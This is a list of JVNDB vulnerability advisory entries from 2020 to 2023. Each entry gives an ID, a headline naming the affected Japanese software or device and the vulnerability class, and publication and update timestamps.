jvndb-2023-003764 Multiple vulnerabilities in Panasonic KW Watcher 2023-09-27T14:44+09:00 2023-09-27T14:44+09:00
jvndb-2023-003592 Multiple vulnerabilities in JTEKT ELECTRONICS Kostac PLC Programming Software 2023-09-13T15:02+09:00 2023-09-13T15:02+09:00
jvndb-2023-003023 Vulnerability in HiRDB 2023-08-29T15:55+09:00 2023-09-06T15:45+09:00
jvndb-2023-003335 Vulnerability in JP1/VERITAS 2023-09-06T15:35+09:00 2023-09-06T15:35+09:00
jvndb-2023-000092 "direct" Desktop App for macOS fails to restrict access permissions 2023-09-06T14:33+09:00 2023-09-06T14:33+09:00
jvndb-2023-000090 Multiple vulnerabilities in CGIs of PMailServer and PMailServer2 2023-09-05T14:55+09:00 2023-09-05T14:55+09:00
jvndb-2023-002787 OMRON CJ series and CS/CJ Series EtherNet/IT unit vulnerable to Denial-of-Service (DoS) 2023-08-03T13:45+09:00 2023-08-03T13:45+09:00
jvndb-2023-002510 Multiple Vulnerabilities in Hitachi Device Manager 2023-07-19T14:48+09:00 2023-07-19T14:48+09:00
jvndb-2023-000065 Multiple vulnerabilities in WAVLINK WL-WN531AX2 2023-06-27T16:50+09:00 2023-06-27T16:50+09:00
jvndb-2023-000063 Multiple vulnerabilities in Panasonic AiSEG2 2023-06-16T14:05+09:00 2023-06-16T14:05+09:00
jvndb-2023-000054 Wacom Tablet Driver installer for macOS vulnerable to improper link resolution before file access 2023-05-25T13:40+09:00 2023-05-25T13:40+09:00
jvndb-2023-001894 Android App "Brother iPrint&Scan" vulnerable to improper access control 2023-05-19T15:40+09:00 2023-05-19T15:40+09:00
jvndb-2023-001852 OS command injection vulnerability in Inaba Denki Sangyo Wi-Fi AP UNIT 2023-05-17T15:09+09:00 2023-05-17T15:09+09:00
jvndb-2023-000036 API server of TONE Family vulnerable to authentication bypass using an alternate path 2023-04-17T14:04+09:00 2023-04-17T14:04+09:00
jvndb-2023-001492 Vulnerability in JP1/VERITAS 2023-04-12T15:01+09:00 2023-04-12T15:01+09:00
jvndb-2023-001400 CONPROSYS HMI System(CHS) vulnerable to SQL injection 2023-04-03T16:19+09:00 2023-04-03T16:19+09:00
jvndb-2021-000070 Multiple vulnerabilities in GroupSession 2021-07-19T15:41+09:00 2023-03-08T17:02+09:00
jvndb-2021-000068 Multiple vulnerabilities in Retty App 2021-07-13T14:34+09:00 2023-03-08T17:02+09:00
jvndb-2021-000033 Hot Pepper Gourmet App fails to restrict access permissions 2021-04-27T17:10+09:00 2023-03-08T17:02+09:00
jvndb-2021-000031 Gurunavi Apps fail to restrict access permissions 2021-04-14T17:22+09:00 2023-03-08T17:02+09:00
jvndb-2020-000079 desknet's NEO vulnerable to cross-site scripting 2020-12-03T17:54+09:00 2023-03-08T17:02+09:00
jvndb-2020-000070 Studyplus App uses a hard-coded API key for an external service 2020-11-05T18:43+09:00 2023-03-08T17:02+09:00
jvndb-2023-000016 The installers of ELECOM Camera Assistant and QuickFileDealer may insecurely load Dynamic Link Libraries 2023-02-14T17:00+09:00 2023-02-14T17:00+09:00
jvndb-2023-001110 Improper restriction of XML external entity reference (XXE) vulnerability in OMRON CX-Motion Pro 2023-01-25T14:28+09:00 2023-01-25T14:28+09:00